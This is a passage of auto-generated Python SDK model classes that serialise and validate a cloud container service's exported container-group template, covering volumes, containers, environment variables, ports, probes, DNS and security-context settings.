self.default_mode = map.get('DefaultMode')
self.items = []
if map.get('Items') is not None:
for k in map.get('Items'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFileItems()
temp_model = temp_model.from_map(k)
self.items.append(temp_model)
else:
self.items = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesEmptyDir(TeaModel):
def __init__(self, size_limit=None):
self.size_limit = size_limit
def validate(self):
self.validate_required(self.size_limit, 'size_limit')
def to_map(self):
result = {}
result['SizeLimit'] = self.size_limit
return result
def from_map(self, map={}):
self.size_limit = map.get('SizeLimit')
return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesNfs(TeaModel):
def __init__(self, server=None, path=None, read_only=None):
self.server = server
self.path = path
self.read_only = read_only
def validate(self):
self.validate_required(self.server, 'server')
self.validate_required(self.path, 'path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['Server'] = self.server
result['Path'] = self.path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.path = map.get('Path')
self.read_only = map.get('ReadOnly')
return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumes(TeaModel):
def __init__(self, name=None, config_file=None, empty_dir=None, nfs=None):
self.name = name
self.config_file = config_file
self.empty_dir = empty_dir
self.nfs = nfs
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.config_file, 'config_file')
if self.config_file:
self.config_file.validate()
self.validate_required(self.empty_dir, 'empty_dir')
if self.empty_dir:
self.empty_dir.validate()
self.validate_required(self.nfs, 'nfs')
if self.nfs:
self.nfs.validate()
def to_map(self):
result = {}
result['Name'] = self.name
if self.config_file is not None:
result['ConfigFile'] = self.config_file.to_map()
else:
result['ConfigFile'] = None
if self.empty_dir is not None:
result['EmptyDir'] = self.empty_dir.to_map()
else:
result['EmptyDir'] = None
if self.nfs is not None:
result['Nfs'] = self.nfs.to_map()
else:
result['Nfs'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
if map.get('ConfigFile') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFile()
self.config_file = temp_model.from_map(map['ConfigFile'])
else:
self.config_file = None
if map.get('EmptyDir') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecVolumesEmptyDir()
self.empty_dir = temp_model.from_map(map['EmptyDir'])
else:
self.empty_dir = None
if map.get('Nfs') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecVolumesNfs()
self.nfs = temp_model.from_map(map['Nfs'])
else:
self.nfs = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFromFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
self.validate_required(self.field_path, 'field_path')
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFrom(TeaModel):
def __init__(self, field_ref=None):
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
if map.get('FieldRef') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFromFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnv(TeaModel):
def __init__(self, name=None, value=None, value_from=None):
self.name = name
self.value = value
self.value_from = value_from
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
self.validate_required(self.value_from, 'value_from')
if self.value_from:
self.value_from.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
if self.value_from is not None:
result['ValueFrom'] = self.value_from.to_map()
else:
result['ValueFrom'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
if map.get('ValueFrom') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFrom()
self.value_from = temp_model.from_map(map['ValueFrom'])
else:
self.value_from = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersPorts(TeaModel):
def __init__(self, name=None, protocol=None, container_port=None):
self.name = name
self.protocol = protocol
self.container_port = container_port
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.protocol, 'protocol')
self.validate_required(self.container_port, 'container_port')
def to_map(self):
result = {}
result['Name'] = self.name
result['Protocol'] = self.protocol
result['ContainerPort'] = self.container_port
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.protocol = map.get('Protocol')
self.container_port = map.get('ContainerPort')
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersVolumeMounts(TeaModel):
def __init__(self, name=None, sub_path=None, mount_path=None, read_only=None):
self.name = name
self.sub_path = sub_path
self.mount_path = mount_path
self.read_only = read_only
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.sub_path, 'sub_path')
self.validate_required(self.mount_path, 'mount_path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['Name'] = self.name
result['SubPath'] = self.sub_path
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.sub_path = map.get('SubPath')
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContextSysctls(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContext(TeaModel):
def __init__(self, sysctls=None):
self.sysctls = []
def validate(self):
self.validate_required(self.sysctls, 'sysctls')
if self.sysctls:
for k in self.sysctls:
if k :
k.validate()
def to_map(self):
result = {}
result['Sysctls'] = []
if self.sysctls is not None:
for k in self.sysctls:
result['Sysctls'].append(k.to_map() if k else None)
else:
result['Sysctls'] = None
return result
def from_map(self, map={}):
self.sysctls = []
if map.get('Sysctls') is not None:
for k in map.get('Sysctls'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContextSysctls()
temp_model = temp_model.from_map(k)
self.sysctls.append(temp_model)
else:
self.sysctls = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersResources(TeaModel):
def __init__(self, cpu=None, memory=None):
self.cpu = cpu
self.memory = memory
def validate(self):
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.memory, 'memory')
def to_map(self):
result = {}
result['Cpu'] = self.cpu
result['Memory'] = self.memory
return result
def from_map(self, map={}):
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainers(TeaModel):
def __init__(self, name=None, image=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, working_dir=None, env=None, ports=None, volume_mounts=None, security_context=None, resources=None, command=None, args=None):
self.name = name
self.image = image
self.image_pull_policy = image_pull_policy
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.working_dir = working_dir
self.env = []
self.ports = []
self.volume_mounts = []
self.security_context = security_context
self.resources = resources
self.command = []
self.args = []
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.image, 'image')
self.validate_required(self.image_pull_policy, 'image_pull_policy')
self.validate_required(self.stdin, 'stdin')
self.validate_required(self.stdin_once, 'stdin_once')
self.validate_required(self.tty, 'tty')
self.validate_required(self.working_dir, 'working_dir')
self.validate_required(self.env, 'env')
if self.env:
for k in self.env:
if k :
k.validate()
self.validate_required(self.ports, 'ports')
if self.ports:
for k in self.ports:
if k :
k.validate()
self.validate_required(self.volume_mounts, 'volume_mounts')
if self.volume_mounts:
for k in self.volume_mounts:
if k :
k.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
self.validate_required(self.resources, 'resources')
if self.resources:
self.resources.validate()
self.validate_required(self.command, 'command')
self.validate_required(self.args, 'args')
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['ImagePullPolicy'] = self.image_pull_policy
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['WorkingDir'] = self.working_dir
result['Env'] = []
if self.env is not None:
for k in self.env:
result['Env'].append(k.to_map() if k else None)
else:
result['Env'] = None
result['Ports'] = []
if self.ports is not None:
for k in self.ports:
result['Ports'].append(k.to_map() if k else None)
else:
result['Ports'] = None
result['VolumeMounts'] = []
if self.volume_mounts is not None:
for k in self.volume_mounts:
result['VolumeMounts'].append(k.to_map() if k else None)
else:
result['VolumeMounts'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
if self.resources is not None:
result['Resources'] = self.resources.to_map()
else:
result['Resources'] = None
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Args'] = []
if self.args is not None:
for k in self.args:
result['Args'].append(k)
else:
result['Args'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.image_pull_policy = map.get('ImagePullPolicy')
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.working_dir = map.get('WorkingDir')
self.env = []
if map.get('Env') is not None:
for k in map.get('Env'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnv()
temp_model = temp_model.from_map(k)
self.env.append(temp_model)
else:
self.env = None
self.ports = []
if map.get('Ports') is not None:
for k in map.get('Ports'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersPorts()
temp_model = temp_model.from_map(k)
self.ports.append(temp_model)
else:
self.ports = None
self.volume_mounts = []
if map.get('VolumeMounts') is not None:
for k in map.get('VolumeMounts'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersVolumeMounts()
temp_model = temp_model.from_map(k)
self.volume_mounts.append(temp_model)
else:
self.volume_mounts = None
if map.get('SecurityContext') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
if map.get('Resources') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersResources()
self.resources = temp_model.from_map(map['Resources'])
else:
self.resources = None
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.args = []
if map.get('Args') is not None:
for k in map.get('Args'):
self.args.append(k)
else:
self.args = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFromFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
self.validate_required(self.field_path, 'field_path')
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFrom(TeaModel):
def __init__(self, field_ref=None):
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
if map.get('FieldRef') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFromFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnv(TeaModel):
def __init__(self, name=None, value=None, value_from=None):
self.name = name
self.value = value
self.value_from = value_from
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
self.validate_required(self.value_from, 'value_from')
if self.value_from:
self.value_from.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
if self.value_from is not None:
result['ValueFrom'] = self.value_from.to_map()
else:
result['ValueFrom'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
if map.get('ValueFrom') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFrom()
self.value_from = temp_model.from_map(map['ValueFrom'])
else:
self.value_from = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersPorts(TeaModel):
def __init__(self, name=None, protocol=None, container_port=None):
self.name = name
self.protocol = protocol
self.container_port = container_port
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.protocol, 'protocol')
self.validate_required(self.container_port, 'container_port')
def to_map(self):
result = {}
result['Name'] = self.name
result['Protocol'] = self.protocol
result['ContainerPort'] = self.container_port
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.protocol = map.get('Protocol')
self.container_port = map.get('ContainerPort')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersVolumeMounts(TeaModel):
def __init__(self, name=None, sub_path=None, mount_path=None, read_only=None):
self.name = name
self.sub_path = sub_path
self.mount_path = mount_path
self.read_only = read_only
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.sub_path, 'sub_path')
self.validate_required(self.mount_path, 'mount_path')
self.validate_required(self.read_only, 'read_only')
def to_map(self):
result = {}
result['Name'] = self.name
result['SubPath'] = self.sub_path
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.sub_path = map.get('SubPath')
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContextSysctls(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContext(TeaModel):
def __init__(self, sysctls=None):
self.sysctls = []
def validate(self):
self.validate_required(self.sysctls, 'sysctls')
if self.sysctls:
for k in self.sysctls:
if k :
k.validate()
def to_map(self):
result = {}
result['Sysctls'] = []
if self.sysctls is not None:
for k in self.sysctls:
result['Sysctls'].append(k.to_map() if k else None)
else:
result['Sysctls'] = None
return result
def from_map(self, map={}):
self.sysctls = []
if map.get('Sysctls') is not None:
for k in map.get('Sysctls'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContextSysctls()
temp_model = temp_model.from_map(k)
self.sysctls.append(temp_model)
else:
self.sysctls = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersResources(TeaModel):
def __init__(self, cpu=None, memory=None):
self.cpu = cpu
self.memory = memory
def validate(self):
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.memory, 'memory')
def to_map(self):
result = {}
result['Cpu'] = self.cpu
result['Memory'] = self.memory
return result
def from_map(self, map={}):
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeHttpGet(TeaModel):
def __init__(self, scheme=None, path=None, port=None):
self.scheme = scheme
self.path = path
self.port = port
def validate(self):
self.validate_required(self.scheme, 'scheme')
self.validate_required(self.path, 'path')
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Scheme'] = self.scheme
result['Path'] = self.path
result['Port'] = self.port
return result
def from_map(self, map={}):
self.scheme = map.get('Scheme')
self.path = map.get('Path')
self.port = map.get('Port')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbe(TeaModel):
def __init__(self, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None, http_get=None):
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
self.exec = exec
self.tcp_socket = tcp_socket
self.http_get = http_get
def validate(self):
self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
self.validate_required(self.period_seconds, 'period_seconds')
self.validate_required(self.success_threshold, 'success_threshold')
self.validate_required(self.failure_threshold, 'failure_threshold')
self.validate_required(self.timeout_seconds, 'timeout_seconds')
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
def to_map(self):
result = {}
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
return result
def from_map(self, map={}):
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
if map.get('Exec') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('TcpSocket') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
if map.get('HttpGet') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeHttpGet(TeaModel):
def __init__(self, scheme=None, path=None, port=None):
self.scheme = scheme
self.path = path
self.port = port
def validate(self):
self.validate_required(self.scheme, 'scheme')
self.validate_required(self.path, 'path')
self.validate_required(self.port, 'port')
def to_map(self):
result = {}
result['Scheme'] = self.scheme
result['Path'] = self.path
result['Port'] = self.port
return result
def from_map(self, map={}):
self.scheme = map.get('Scheme')
self.path = map.get('Path')
self.port = map.get('Port')
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbe(TeaModel):
def __init__(self, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None, http_get=None):
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
self.exec = exec
self.tcp_socket = tcp_socket
self.http_get = http_get
def validate(self):
self.validate_required(self.initial_delay_seconds, 'initial_delay_seconds')
self.validate_required(self.period_seconds, 'period_seconds')
self.validate_required(self.success_threshold, 'success_threshold')
self.validate_required(self.failure_threshold, 'failure_threshold')
self.validate_required(self.timeout_seconds, 'timeout_seconds')
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
def to_map(self):
result = {}
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
return result
def from_map(self, map={}):
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
if map.get('Exec') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('TcpSocket') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
if map.get('HttpGet') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecContainers(TeaModel):
def __init__(self, name=None, image=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, working_dir=None, env=None, ports=None, volume_mounts=None, security_context=None, resources=None, readiness_probe=None, liveness_probe=None, command=None, args=None):
self.name = name
self.image = image
self.image_pull_policy = image_pull_policy
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.working_dir = working_dir
self.env = []
self.ports = []
self.volume_mounts = []
self.security_context = security_context
self.resources = resources
self.readiness_probe = readiness_probe
self.liveness_probe = liveness_probe
self.command = []
self.args = []
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.image, 'image')
self.validate_required(self.image_pull_policy, 'image_pull_policy')
self.validate_required(self.stdin, 'stdin')
self.validate_required(self.stdin_once, 'stdin_once')
self.validate_required(self.tty, 'tty')
self.validate_required(self.working_dir, 'working_dir')
self.validate_required(self.env, 'env')
if self.env:
for k in self.env:
if k :
k.validate()
self.validate_required(self.ports, 'ports')
if self.ports:
for k in self.ports:
if k :
k.validate()
self.validate_required(self.volume_mounts, 'volume_mounts')
if self.volume_mounts:
for k in self.volume_mounts:
if k :
k.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
self.validate_required(self.resources, 'resources')
if self.resources:
self.resources.validate()
self.validate_required(self.readiness_probe, 'readiness_probe')
if self.readiness_probe:
self.readiness_probe.validate()
self.validate_required(self.liveness_probe, 'liveness_probe')
if self.liveness_probe:
self.liveness_probe.validate()
self.validate_required(self.command, 'command')
self.validate_required(self.args, 'args')
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['ImagePullPolicy'] = self.image_pull_policy
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['WorkingDir'] = self.working_dir
result['Env'] = []
if self.env is not None:
for k in self.env:
result['Env'].append(k.to_map() if k else None)
else:
result['Env'] = None
result['Ports'] = []
if self.ports is not None:
for k in self.ports:
result['Ports'].append(k.to_map() if k else None)
else:
result['Ports'] = None
result['VolumeMounts'] = []
if self.volume_mounts is not None:
for k in self.volume_mounts:
result['VolumeMounts'].append(k.to_map() if k else None)
else:
result['VolumeMounts'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
if self.resources is not None:
result['Resources'] = self.resources.to_map()
else:
result['Resources'] = None
if self.readiness_probe is not None:
result['ReadinessProbe'] = self.readiness_probe.to_map()
else:
result['ReadinessProbe'] = None
if self.liveness_probe is not None:
result['LivenessProbe'] = self.liveness_probe.to_map()
else:
result['LivenessProbe'] = None
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Args'] = []
if self.args is not None:
for k in self.args:
result['Args'].append(k)
else:
result['Args'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.image_pull_policy = map.get('ImagePullPolicy')
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.working_dir = map.get('WorkingDir')
self.env = []
if map.get('Env') is not None:
for k in map.get('Env'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersEnv()
temp_model = temp_model.from_map(k)
self.env.append(temp_model)
else:
self.env = None
self.ports = []
if map.get('Ports') is not None:
for k in map.get('Ports'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersPorts()
temp_model = temp_model.from_map(k)
self.ports.append(temp_model)
else:
self.ports = None
self.volume_mounts = []
if map.get('VolumeMounts') is not None:
for k in map.get('VolumeMounts'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersVolumeMounts()
temp_model = temp_model.from_map(k)
self.volume_mounts.append(temp_model)
else:
self.volume_mounts = None
if map.get('SecurityContext') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
if map.get('Resources') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersResources()
self.resources = temp_model.from_map(map['Resources'])
else:
self.resources = None
if map.get('ReadinessProbe') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbe()
self.readiness_probe = temp_model.from_map(map['ReadinessProbe'])
else:
self.readiness_probe = None
if map.get('LivenessProbe') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbe()
self.liveness_probe = temp_model.from_map(map['LivenessProbe'])
else:
self.liveness_probe = None
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.args = []
if map.get('Args') is not None:
for k in map.get('Args'):
self.args.append(k)
else:
self.args = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecDnsConfigOptions(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class ExportContainerGroupTemplateResponseTemplateSpecDnsConfig(TeaModel):
def __init__(self, options=None, name_servers=None, searches=None):
self.options = []
self.name_servers = []
self.searches = []
def validate(self):
self.validate_required(self.options, 'options')
if self.options:
for k in self.options:
if k :
k.validate()
self.validate_required(self.name_servers, 'name_servers')
self.validate_required(self.searches, 'searches')
def to_map(self):
result = {}
result['Options'] = []
if self.options is not None:
for k in self.options:
result['Options'].append(k.to_map() if k else None)
else:
result['Options'] = None
result['NameServers'] = []
if self.name_servers is not None:
for k in self.name_servers:
result['NameServers'].append(k)
else:
result['NameServers'] = None
result['Searches'] = []
if self.searches is not None:
for k in self.searches:
result['Searches'].append(k)
else:
result['Searches'] = None
return result
def from_map(self, map={}):
self.options = []
if map.get('Options') is not None:
for k in map.get('Options'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecDnsConfigOptions()
temp_model = temp_model.from_map(k)
self.options.append(temp_model)
else:
self.options = None
self.name_servers = []
if map.get('NameServers') is not None:
for k in map.get('NameServers'):
self.name_servers.append(k)
else:
self.name_servers = None
self.searches = []
if map.get('Searches') is not None:
for k in map.get('Searches'):
self.searches.append(k)
else:
self.searches = None
return self
class ExportContainerGroupTemplateResponseTemplateSpecSecurityContextSysctls(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class ExportContainerGroupTemplateResponseTemplateSpecSecurityContext(TeaModel):
def __init__(self, sysctls=None):
self.sysctls = []
def validate(self):
self.validate_required(self.sysctls, 'sysctls')
if self.sysctls:
for k in self.sysctls:
if k :
k.validate()
def to_map(self):
result = {}
result['Sysctls'] = []
if self.sysctls is not None:
for k in self.sysctls:
result['Sysctls'].append(k.to_map() if k else None)
else:
result['Sysctls'] = None
return result
def from_map(self, map={}):
self.sysctls = []
if map.get('Sysctls') is not None:
for k in map.get('Sysctls'):
temp_model = ExportContainerGroupTemplateResponseTemplateSpecSecurityContextSysctls()
temp_model = temp_model.from_map(k)
